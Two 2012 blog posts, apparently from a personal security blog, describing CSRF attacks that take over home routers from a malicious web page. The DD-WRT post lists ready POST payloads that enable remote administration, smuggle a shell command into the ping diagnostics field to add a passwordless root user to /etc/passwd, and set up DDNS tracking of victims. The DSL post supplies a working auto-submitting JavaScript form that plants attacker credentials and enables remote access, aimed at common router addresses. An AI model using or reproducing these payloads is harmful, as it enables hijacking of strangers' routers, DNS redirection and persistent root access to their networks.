Saturday, February 18, 2012

Attacking wireless routers running DD WRT

The previous post talks about CSRF attacks on DSL modems. A similar attack on routers with the dd wrt firmware is also possible. I will try a few different possibilities here which eventually lead to the attacker taking control of the router using a simple javascript hosted on another website.

All requests need to be made to the target "apply.cgi". Possible hosts can be 192.168.1.1, 192.168.0.1, 10.0.0.1, 10.0.1.1 and so on.


1. Enable remote http administration on port 8989

The following POST request needs to be made:

submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989

2. Add a new user(outsider) to the system and set it's password as null
POST Request to add user every time the router reboots:

submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

POST Request to instantly add user(gets erased if when router reboots, hence to be used with previous POST request):

submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

3. Add a DDNS entry to obtain the public IP of the victim(incase the attack is targeted to a fixed public IP):
POST request if the DDNS provider is afraid.org:

submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1

* for different providers different values for the ddns_enable parameter can be tried. In the above case its afraid.org, username is uname, password is passed and the hostname is wrtvictim.net


Once an attacker has control over the router, other things can be done like setting up port forwarding rules, setting up a rogue DNS server for DHCP clients, setting it up as a VPN server/client, add access restrictions to prevent access to certain domains, setting up an identified host in the DMZ etc. Though I haven't tried yet, a modified firmware can also be uploaded on to the router using the upgrade functionality. If a connection over the remote port does not allow this, port forwarding can be setup to make the connection appear to originate from the LAN.

Wednesday, February 8, 2012

Attacking a DSL modem/router using a simple javascript

This is a known issue for a few years but its surprising that DSL modem/router manufacturers have still not fixed the issue(at least not mine ;)). My router's administration web server  accepts HTTP POST requests from a user with an authenticated session without validating them against any token or checking the referrer section in the HTTP header. Thus, the router can accept requests originating from a user's browser irrespective of whether the request was generated voluntarily by the user from the router's web interface or if an automated script stored on another website generated that request on the user's behalf. The latter one is the risky condition we are talking about.

I wrote a small proof of concept javascript to craft a POST request to a specific URL of the router's web server in order to open the router to allow remote administration. This URL also accepts the credentials used for connecting remotely. Hence, the malicious script successfully pushes the username and password of the attacker's choice, using the victim's authenticated session with the DSL router.

The above part is very easy to perform and the victim's modem configured to welcome remote connections over the public network. The challenge for the attacker now is to find the public IP address of the victim, otherwise the above actions are of no use. Some techniques are possible:

1. Push settings for DDNS into the DSL router's configuration
2. Host a listener online which logs incoming connections' IP addresses and make the above malicious script place a sample request to this listener.
3. Include additional script to connect to a service like whatismyip.com and fetch the public ip address and post it on some anonymous board online(a little difficult to achieve due to browser restrictions)

The first one is manageable if the attack is targeted to one particular individual. If the router reboots or jumps IP addresses, the attacker can constantly keep a track. There are many free DDNS services available online and the attacker can maintain anonymity too.

The second one risks the attacker being identified due to the ownership of the listener service. But multiple victims can be targeted and maintained.

The third option provides both, anonymity and unlimited victims, but is very difficult to achieve due to browser restrictions. I am still working on a sample javascript to achieve it but there are a couple of things holding me back:
a. Response from whatismyip.com or any other service cannot be accessed by a script running on another domain.
b. I haven't yet found an anonymous online board which I can use to post messages using automated scripts. This is mainly due to the use of CAPTCHA or some other human verification tool being used by these services.

 Another challenge is to guess the Private IP address of the DSL router, for the javascript to write configuration data successfully. The most common ones are 192.168.0.1, 192.168.1.1, 10.0.0.1, 10.0.1.1 and so on. All the most likely IP addresses can be targeted/brute forced. Finally, below is the script I wrote specifically for my router. It will vary depending on the model and make of the router.

<script type="text/javascript">
function post_to_url(router) {

method = "post";
var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", "http://" + router + "/remote_config");

//Post variables
        var userid = document.createElement("input");
        userid.setAttribute("type", "hidden");
        userid.setAttribute("name", "__AdminUserID");
        userid.setAttribute("value", "hacker");
        form.appendChild(userid);

        var password = document.createElement("input");
        password.setAttribute("type", "hidden");
        password.setAttribute("name", "__AdminPassword");
        password.setAttribute("value", "hackerpass");
        form.appendChild(password);

        var timeoutdisable = document.createElement("input");
        timeoutdisable.setAttribute("type", "hidden");
        timeoutdisable.setAttribute("name", "TimeOut_Disable");
        timeoutdisable.setAttribute("value", "on");
        form.appendChild(timeoutdisable);
 

        var enableremoteaccess = document.createElement("input");
        enableremoteaccess.setAttribute("type", "hidden");
        enableremoteaccess.setAttribute("name", "Enable_RemoteAccess");
        enableremoteaccess.setAttribute("value", "on");
        form.appendChild(enableremoteaccess);

    document.body.appendChild(form);
    form.submit();
}
</script>



The above script sets the POST parameters __AdminUserID, __AdminPassword, Timeout_Disable and Enable_RemoteAccess with the values of the attacker's choice and makes a POST request to the router's IP address. I have masked the actual parameters used by my DSL modem(for no reason at all ;)) but as long as you get the parameter names right, the attack surely works.

And the script can be called using the following:

<script>post_to_url("192.168.0.1")</script>

<script>post_to_url("192.168.1.1")</script>

<script>post_to_url("10.0.1.1")</script>


I also have a few wireless routers lying around with the dd-wrt firmware on them. Next, my goal is to test if a similar attack works on them too.
In conclusion, for this kind of an attack to work, there are numerous pre-conditions that might dictate the success or failure of such an attack:

1. Victim visits the malicious website
2. Victim has an authenticated session with the router's web interface
3. The modem has not changed its public IP address
4. The POST request contains the exact parameters required to make the change.

There can be more damaging effects of such an attack:

a. The DNS address is set to a malicious DNS server in the modem configuration
b. The ssid and network key of the router is modified
c. A denial of service attack is carried out by blocking access to certain public IPs/URLs on the internet
d. The dd-wrt firmware allows users to execute commands from the web interface, the attacker can craft an attack to run any command on the victim's router